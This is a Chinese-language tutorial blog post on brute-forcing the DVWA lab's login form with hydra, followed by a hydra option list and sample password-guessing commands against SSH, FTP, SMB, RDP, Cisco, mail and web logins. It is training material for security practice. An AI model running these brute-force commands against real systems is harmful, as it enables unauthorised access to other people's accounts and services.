kali:OWASP DVWA Vulnerability: Brute Force 暴力破解的具体实现

首先给出正确的暴力破解命令:

hydra -l admin -P /usr/share/wordlists/metasploit/password.lst  10.10.10.143 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=9gughtdqf2rbv8cl6de9fmvui2;"

kali:OWASP DVWA Vulnerability: Brute Force 暴力破解的具体实现_第1张图片


C指定的是cookie文件的路径, 这个路径是服务器上的路径, 也就是说如果服务器上存放cookie的文件是/path/cookie, 那么就可以用:C=/path/cookie来指定hydra从服务器上获取cookie, 然后自动添加到每次的get或者post的http header中, 如果像dvwa这样没有cookie的专门文件或者我们不知道cookie的存放文件, 那么就用:H来每次手动指定。

如果指定了:C=/path/cookie 那么每次hydra提交之前首先会去get /path/cookie 来得到cookie, 然后每次分析response返回的信息,自动将cookie添加到http 的header中。

:H其实是用来手动添加Header 域的, 比如上面的我们手动添加了 :H=Cookie: security=low; PHPSESSID=9gughtdqf2rbv8cl6de9fmvui2;(PHPSESSID通过burpsuite获得这个值很重要), 这其实是告诉hydra每次get或者post的时候要添加上这个:H后面的头部的域。


坑1:

如果你认为如下就能自动破解那就大错特错了,啥也暴不出来,因为这是http-get-form提交形式:

hydra -l admin -P password.txt  IP http-get "/dvwa/vulnerabilities/brute/"

坑2:

如果认为按以下暴力破解也会错,因为form必须制定username、password对应参数

hydra -l admin -P password.txt  127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/"

坑3:

如果按找DVWA网站的破解说明构造,也一定不对。hydra一般不会考虑cookie,

hydra -l admin -P password.txt -vV 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect."

发现这个cookie是在使用浏览器登录的时候就设置好的, 不同的浏览器cookie是不同的, 开始默认的security= high, 当修改安全级别后服务器会重新发送set-cookie 为low, 以后每次提交表单或者get 操作都要提交这个cookie, 负责服务器验证是通不过的。

下面关键的来了:

用burpsuite,截获网页信息

当我们登录成功后将安全等级提交为lhigh和ow后, 可以看到cookie是有变化的,可以获取到PHPSESSID=9gughtdqf2rbv8cl6de9fmvui2;这个太重要了。


最后给出hydra的用法:不见得有用:

参数说明
 
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
 
-R 继续从上一次进度接着破解。
 
-S 采用SSL链接。
 
-s PORT 可通过这个参数指定非默认端口。
 
-l LOGIN 指定破解的用户,对特定用户破解。
 
-L FILE 指定用户名字典。
 
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
 
-P FILE 大写,指定密码字典。
 
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
 
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
 
-M FILE 指定目标列表文件一行一条。
 
-o FILE 指定结果输出文件。
 
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
 
-t TASKS 同时运行的线程数,默认为16。
 
-w TIME 设置最大超时的时间,单位秒,默认是30s。
 
-v / -V 显示详细过程。
 
server 目标ip
 
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。
 
OPT 可选项


1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
 
 
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
 
 
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
 
 
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。)<br>  <br>  <br> 5、破解https:<br> hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https<br>  <br>  <br>  <br> 6、破解teamspeak:<br> hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak<br>  <br>  <br>  <br> 7、破解cisco:<br> hydra -P pass.txt 10.36.16.18 cisco<br> hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable<br>  <br>  <br>  <br> 8、破解smb:<br> hydra -l administrator -P pass.txt 10.36.16.18 smb<br>  <br>  <br>  <br> 9、破解pop3:<br> hydra -l muts -P pass.txt my.pop3.mail pop3<br>  <br>  <br>  <br> 10、破解rdp:<br> hydra ip rdp -l administrator -P pass.txt -V<br>  <br>  <br>  <br> 11、破解http-proxy:<br> hydra -l admin -P pass.txt http-proxy://10.36.16.18<br>  <br>  <br>  <br> 12、破解imap:<br> hydra -L user.txt -p secret 10.36.16.18 imap PLAIN<br> hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</p> <p> </p> <p> </p> <p> </p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1292034362681925632"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(kali,kali)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1835020661836312576.htm" title="内网穿透之EW使用、判断服务器是否出网" target="_blank">内网穿透之EW使用、判断服务器是否出网</a> <span class="text-muted">板栗妖怪</span> <a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/1.htm">内网渗透</a> <div>环境搭建使用的是下面文章的环境记一次学习--内网穿透-CSDN博客ew代理然后同样通过thinkphp漏洞写入文件,然后通过蚁剑连接然后上传ew的Linux版本,然后加权执行一层代理正向代理设置正向代理(在ubuntu上),然后kali在proxychain配置文件中连接ubuntu的192.168.244.154的代理端口反向代理在ubuntu上设置反向代理,将连接反弹到kali上的某个端口。然</div> </li> <li><a href="/article/1834896977599492096.htm" title="CTF——web方向学习攻略" target="_blank">CTF——web方向学习攻略</a> <span class="text-muted">一则孤庸</span> <a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a> <div>1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题</div> </li> <li><a href="/article/1834546422066802688.htm" title="【CTF】MISC常用工具集锦/使用方法简介" target="_blank">【CTF】MISC常用工具集锦/使用方法简介</a> <span class="text-muted">不会代码的小徐</span> <a class="tag" taget="_blank" href="/search/misc/1.htm">misc</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7/1.htm">测试工具</a> <div>前言#MISC题型多变而且工具繁杂,因此自己花时间整理了一份工具列表,以便日后参考用流畅地阅读这篇博客,你可能需要:Python2.7.18+Python3.8+任何一个更高版本的Python,使用conda管理Linux虚拟机,kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?),整合了多种脚本(base,字频分析,pn</div> </li> <li><a href="/article/1832077496175128576.htm" title="使用Kali Linux hping3实现Dos攻击" target="_blank">使用Kali Linux hping3实现Dos攻击</a> <span class="text-muted">晓时谷雨</span> <a class="tag" taget="_blank" href="/search/Kali/1.htm">Kali</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/kali/1.htm">kali</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>KaliLinux实现Dos攻击首先什么是Dos攻击?  DoS是DenialofService的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络宽带攻击和连通性攻击。    DoS攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使</div> </li> <li><a href="/article/1830415484835688448.htm" title="ubuntu/debian/kali一键更新所有软件" target="_blank">ubuntu/debian/kali一键更新所有软件</a> <span class="text-muted">L0kLOkpu55Y</span> <a class="tag" taget="_blank" href="/search/%E7%AE%80%E5%8D%95linux/1.htm">简单linux</a><a class="tag" taget="_blank" href="/search/debian/1.htm">debian</a><a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>ubuntu/debian/kali一键更新所有软件更新软件源:sudoaptupdate一键更新所有软件:sudoaptdist-upgrade更新软件源并且更新所有软件:sudoaptupdate&&sudoaptdist-upgrade</div> </li> <li><a href="/article/1829776232225533952.htm" title="Kali Linux 2020.1安装桌面" target="_blank">Kali Linux 2020.1安装桌面</a> <span class="text-muted">大学霸IT达人</span> <div>KaliLinux2020.1安装桌面KaliLinux2020.1安装后,可能没有安装图形界面,进入的是终端模式。此时,用户则需要安装图形界面相关的软件包。例如,这里将安装XFCE桌面。操作步骤如下所示大学霸IT达人:(1)配置软件源。执行命令:vi/etc/apt/sources.lst添加官方软件源debhttp://http.kali.org/kalikali-rollingmainnon</div> </li> <li><a href="/article/1828697287979790336.htm" title="springboot集成kafka @SendTo对于转发单条消息和转发批量消息的两种情况" target="_blank">springboot集成kafka @SendTo对于转发单条消息和转发批量消息的两种情况</a> <span class="text-muted">ddq呀</span> <a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a> <div>//当转发单条消息时,可以采用如下方式@KafkaListener(groupId="a-group",topics="a-topic")@SendTo("b-topic")publicStringconsumeA(ConsumerRecordconsumerRecord){returnconsumerRecord.value();}@KafkaListener(groupId="b-group"</div> </li> <li><a href="/article/1828248289133293568.htm" title="kali 安装中文输入 unable to locate package错误解决办法" target="_blank">kali 安装中文输入 unable to locate package错误解决办法</a> <span class="text-muted">cuisidong1997</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a> <div>问题出在执行sudoapt-getinstall之前更换了软件源,但是却忘了update下了,于是执行下面的命令:sudoapt-getupdate等上面命令执行完后,再执行sudoaptinstallnet-tools就可以了!</div> </li> <li><a href="/article/1827473821901352960.htm" title="关键点检测笔记(3)——关键点检测的概念扫盲" target="_blank">关键点检测笔记(3)——关键点检测的概念扫盲</a> <span class="text-muted">战争热诚</span> <a class="tag" taget="_blank" href="/search/%E5%85%B3%E9%94%AE%E7%82%B9%E6%A3%80%E6%B5%8B%E7%B3%BB%E5%88%97/1.htm">关键点检测系列</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E8%A7%86%E8%A7%89%E6%A3%80%E6%B5%8B/1.htm">视觉检测</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div>关键点检测,也被称作关键点定位或关键点对齐(keypointalignment),在不同的任务中名字可能略有差异。比如,在人脸关键点定位中会被称作facemarkalignment,在人体关键点检测中称作posealignment。通常,它的输入是一张包含目标的图像,比如人脸的图像、人体的图像或手部的图像,输出是一组预先定义好关键点的位置,比如人脸的五官与脸部轮廓、人体的各个关节、手部的各个关节等</div> </li> <li><a href="/article/1826866153612472320.htm" title="【每天一句,30天学好英语】" target="_blank">【每天一句,30天学好英语】</a> <span class="text-muted">壹典心理咨询</span> <div>【2023-1-19】早安春夏秋冬Wehaveworkedhardtocometothisworld,butnotfortheunbeautifulandsadweseeeveryday,wehavecriedenoughwhenwewereborn,andwe,noonecangobackalive,sodon'tspendtimelow,tobelieve,tobelonely,tolovea</div> </li> <li><a href="/article/1826828948667985920.htm" title="SQL 注入 漏洞测试 POP 注入 windows和Linux均可使用,已测试成功" target="_blank">SQL 注入 漏洞测试 POP 注入 windows和Linux均可使用,已测试成功</a> <span class="text-muted">3分云计算</span> <a class="tag" taget="_blank" href="/search/%E7%81%AB%E7%BB%92%E9%AB%98%E7%BA%A7%E6%9D%80%E6%AF%92/1.htm">火绒高级杀毒</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97%E5%8F%8A%E8%BF%90%E7%BB%B4/1.htm">云计算及运维</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%80%A7%E6%B5%8B%E8%AF%95/1.htm">安全性测试</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a><a class="tag" taget="_blank" href="/search/kali-linux/1.htm">kali-linux</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/pop%E6%B3%A8%E5%85%A5/1.htm">pop注入</a><a class="tag" taget="_blank" href="/search/sql%E6%B3%A8%E5%85%A5%E2%80%98/1.htm">sql注入‘</a><a class="tag" taget="_blank" href="/search/vbs/1.htm">vbs</a><a class="tag" taget="_blank" href="/search/%E6%AD%BB%E5%BE%AA%E7%8E%AF/1.htm">死循环</a> <div>目录前言SQL注入SQL注入的种类常见的注入点预防措施示例POP注入的基本概念KaliLinux上使用Nmap、Metasploit和其他工具进行POP3服务的漏洞测试1.初步扫描2.检查已知漏洞3.使用Metasploit4.使用Telnet手动测试5.检查远程代码执行漏洞漏洞测试防御措施反序列化漏洞的示例防止POP注入预防措施参考示例使用PowerShell进行攻击注册表操作使用计划任务DLL</div> </li> <li><a href="/article/1769163948898189312.htm" title="kubernetes解决nginx跨域问题" target="_blank">kubernetes解决nginx跨域问题</a> <span class="text-muted">滴流乱转的小胖子</span> <div>官方文档出处:https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#enable-cors%20%E4%BD%9C%E8%80%85%EF%BC%9AKaliArch%20%E9%93%BE%E6%8E%A5%EF%BC%9Ahttps://www.imooc.com/artic</div> </li> <li><a href="/article/1765599779590594560.htm" title="Linux skill命令教程:如何发送信号或报告进程状态(附实例详解和注意事项)" target="_blank">Linux skill命令教程:如何发送信号或报告进程状态(附实例详解和注意事项)</a> <span class="text-muted">我要下东西噢</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a> <div>Linuxskill命令介绍skill命令是用来发送信号或报告进程状态的。这个命令的默认信号是TERM。然而,这个命令已经被认为是过时和不可移植的,其命令语法定义得很差。建议使用killall,pkill,和pgrep命令代替。Linuxskill命令适用的Linux版本skill命令在大多数Linux发行版中都可以使用,包括Debian、Ubuntu、Alpine、ArchLinux、KaliL</div> </li> <li><a href="/article/1765308382874525696.htm" title="网络安全:kali之MSF工具基本使用方法" target="_blank">网络安全:kali之MSF工具基本使用方法</a> <span class="text-muted">诺卡先生</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1.htm">网络安全学习笔记</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>1、进入MSF工具:nsfconsole2、查询漏洞利用工具:search漏洞编号3、打开工具:use工具id4、查看工具配置参数:showoptions5、查看工具的详细信息:info6、配置参数:set参数头目标主机set参数头目标端口(参数配置根据实际所缺参数为准)7、运行工具:run或者exploit@返回命令:back@新版kali已经自动配置Payload;不需要再次自己配置(当然也可</div> </li> <li><a href="/article/1759936947712782336.htm" title="NSSCTF-MISC [SWPU 2019]神奇的二维码" target="_blank">NSSCTF-MISC [SWPU 2019]神奇的二维码</a> <span class="text-muted">不叫李嘉图</span> <a class="tag" taget="_blank" href="/search/ctf/1.htm">ctf</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a> <div>得到一个二维码扫一下得到得到一个类似flag的东西提交错误我们拖进kali里面看看strings看一下发现有文件这里我开始使用foremost分离分离没成功我们在使用binwalk分离成功我们看flag.jpg没有隐藏信息了看flag.doc是base64编码但是我们解码之后还有加密我们使用脚本让他循环去跑importbase64defdecode(f):n=0whileTrue:try:f=ba</div> </li> <li><a href="/article/1759936820960915456.htm" title="[SWPU 2019]神奇的二维码" target="_blank">[SWPU 2019]神奇的二维码</a> <span class="text-muted">王八七七</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>1.直接扫码得到fakeflag——swpuctf{flag_is_not_here}2.使用kali中的binwalk命令,将图片中的隐藏内容显示出来打开encode.txt文件,得到一串base64的密文、解密后得到将flag.jpg解压出来得到,并放入winhex进行分析挨个查找发现18394压缩包中存在音频文件,使用刚刚解出来的密码显示密码错误查看flag.doc,猜测应该是base64套</div> </li> <li><a href="/article/1759936301932572672.htm" title="buuctf-misc-[SWPU2019]神奇的二维码1" target="_blank">buuctf-misc-[SWPU2019]神奇的二维码1</a> <span class="text-muted">mlws1900</span> <a class="tag" taget="_blank" href="/search/buuctfmisc/1.htm">buuctfmisc</a><a class="tag" taget="_blank" href="/search/ctf/1.htm">ctf</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/servlet/1.htm">servlet</a><a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a><a class="tag" taget="_blank" href="/search/ctf/1.htm">ctf</a> <div>下载附件,看到一个二维码利用二维码工具进行扫码,获得信息flag不在此,用winhex打开观察到多个rar文件和类似base64编码的内容看到最后看到一个mp3文件,开始文件分离(用windows系统的foremost无法分离文件)用kali的binwalk进行分离发现四个rar文件一一打开查看第一个rar文件打开一个图片和一个无法打开的f图片第二个rar文件YXNkZmdoamtsMTIzNDU</div> </li> <li><a href="/article/1759936172785758208.htm" title="SWPU 神奇的二维码 【MISC】" target="_blank">SWPU 神奇的二维码 【MISC】</a> <span class="text-muted">快来吹风</span> <a class="tag" taget="_blank" href="/search/ctf/1.htm">ctf</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>最近在跟着大佬们打ctf比赛,现在的比赛中web题都已经很难了(悲),不太适合我这种纯小白入手,个人打算从杂项开始入门,能获得一些ctf中的快乐。这是NSSCTF中2019年SWPU中的一个杂项题神奇的二维码题目是就是一个二维码:(不打码发不出来,审核说我图片违规/(ㄒoㄒ)/~~)首先是扫一扫,然而没什么收获放到kali中检测一下发现图片里面藏了4个rar文件分解后得到了四个压缩包txt文件和w</div> </li> <li><a href="/article/1759936173637201920.htm" title="BUUCTF [SWPU2019]神奇的二维码 1" target="_blank">BUUCTF [SWPU2019]神奇的二维码 1</a> <span class="text-muted">玥轩_521</span> <a class="tag" taget="_blank" href="/search/BUUCTF/1.htm">BUUCTF</a><a class="tag" taget="_blank" href="/search/MISC/1.htm">MISC</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/BUUCTF/1.htm">BUUCTF</a><a class="tag" taget="_blank" href="/search/Misc/1.htm">Misc</a> <div>BUUCTF:https://buuoj.cn/challenges题目描述:得到的flag请包上flag{}提交。密文:下载附件,得到一个.png图片。解题思路:1、使用QRresearch扫一下,得到“swpuctf{flag_is_not_here}”的提示。2、放到010Editor中看一下,没找到什么明显的特征。使用Kali中的binwalk工具进行检测,发现四个rar压缩包。使用bin</div> </li> <li><a href="/article/1759936045354414080.htm" title="BUUCTF misc 专题(47)[SWPU2019]神奇的二维码" target="_blank">BUUCTF misc 专题(47)[SWPU2019]神奇的二维码</a> <span class="text-muted">tt_npc</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div>下载附件,得到一张二维码图片,并用工具扫描(因为图片违规了,所以就不放了哈。工具的话,一般的二维码扫描都可以)swpuctf{flag_is_not_here},(刚开始出了点小差错对不住各位师傅)根据提示知道答案并不在这里,拖入winhex进行查看搜索出多个Rar,将文件放入kali进行binwalk分离出了多个rar,先查看txt文档中的内容YXNkZmdoamtsMTIzNDU2Nzg5MA</div> </li> <li><a href="/article/1759803275437240320.htm" title="vulvhub-----Hacker-KID靶机" target="_blank">vulvhub-----Hacker-KID靶机</a> <span class="text-muted">郑居中3.0</span> <a class="tag" taget="_blank" href="/search/vulnhub%E9%9D%B6%E6%9C%BA/1.htm">vulnhub靶机</a><a class="tag" taget="_blank" href="/search/hacker-KID/1.htm">hacker-KID</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div>打靶详细教程1.网段探测2.端口服务扫描3.目录扫描4.收集信息burpsuite抓包5.dig命令6.XXE漏洞读取.bashrc文件7.SSTI漏洞8.提权1.查看python是否具备这个能力2.使用python执行exp.py脚本,如果提权成功,靶机则会开放5600端口1.网段探测┌──(root㉿kali)-[~]└─#arp-scan-lInterface:eth0,type:EN10M</div> </li> <li><a href="/article/1759776066064445440.htm" title="kali从入门到入狱之使用Hping3进行DDos攻击" target="_blank">kali从入门到入狱之使用Hping3进行DDos攻击</a> <span class="text-muted">一朝乐</span> <a class="tag" taget="_blank" href="/search/ddos/1.htm">ddos</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>在Kali中自带的工具Hping3,直接使用即可Hping3的常用命令如下:-c//发送的数据包的数量-d//发送到目标机器的每个数据包的大小。单位是字节-S=只发送SYN数据包-w//窗口大小-p//目的地端口号-S//表示发送的是SYN包,即不需要收到回复报文,一直发送--keep//保持源端口--fast//每秒10个包--faster//每秒100个包-–flood//洪水攻击模式,尽可能</div> </li> <li><a href="/article/1759775423920697344.htm" title="kali无线渗透之蓝牙原理与探测与侦听" target="_blank">kali无线渗透之蓝牙原理与探测与侦听</a> <span class="text-muted">想拿 0day 的脚步小子</span> <a class="tag" taget="_blank" href="/search/kali%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">kali无线渗透</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F/1.htm">渗透</a><a class="tag" taget="_blank" href="/search/%E6%97%A0%E7%BA%BF/1.htm">无线</a><a class="tag" taget="_blank" href="/search/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">无线渗透</a><a class="tag" taget="_blank" href="/search/%E8%93%9D%E7%89%99/1.htm">蓝牙</a><a class="tag" taget="_blank" href="/search/%E8%93%9D%E7%89%99%E6%B8%97%E9%80%8F/1.htm">蓝牙渗透</a> <div>“传统蓝牙”规范在2.4GHz的ISM波段上定义了79个信道,每个信道有1MHz的带宽。设备在这些信道中以每秒1600次的频率进行跳转,换句话说,就是每微秒625次跳转。这项信道跳转技术被称为“跳频扩频”(FrequencyHoppingSpreadSpectrum,FHSS),这时的蓝牙设备中,用户最大可以达到3Mbps的通信带宽,最大约为100米的传输距离。“跳频扩频”通过在射频(RadioF</div> </li> <li><a href="/article/1759775422272335872.htm" title="kali无线渗透之用wps加密模式可破解wpa模式的密码12" target="_blank">kali无线渗透之用wps加密模式可破解wpa模式的密码12</a> <span class="text-muted">想拿 0day 的脚步小子</span> <a class="tag" taget="_blank" href="/search/kali%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">kali无线渗透</a><a class="tag" taget="_blank" href="/search/wps/1.htm">wps</a><a class="tag" taget="_blank" href="/search/%E6%99%BA%E8%83%BD%E8%B7%AF%E7%94%B1%E5%99%A8/1.htm">智能路由器</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">无线渗透</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F/1.htm">渗透</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>WPS(Wi-FiProtectedSetup,Wi-Fi保护设置)是由Wi-Fi联盟推出的全新Wi-Fi安全防护设定标准。该标准推出的主要原因是为了解决长久以来无线网络加密认证设定的步骤过于繁杂之弊病,使用者往往会因为步骤太过麻烦,以致干脆不做任何加密安全设定,因而引发许多安全上的问题。本章将介绍WPS加密模式。WPS(Wi-FiProtectedSetup)是一种简化无线网络配置的标准。它使用</div> </li> <li><a href="/article/1759775294606110720.htm" title="kali无线渗透强力攻击工具mdk3原理和使用" target="_blank">kali无线渗透强力攻击工具mdk3原理和使用</a> <span class="text-muted">想拿 0day 的脚步小子</span> <a class="tag" taget="_blank" href="/search/kali%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">kali无线渗透</a><a class="tag" taget="_blank" href="/search/kali/1.htm">kali</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F/1.htm">渗透</a><a class="tag" taget="_blank" href="/search/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">无线渗透</a><a class="tag" taget="_blank" href="/search/%E6%97%A0%E7%BA%BF/1.htm">无线</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a> 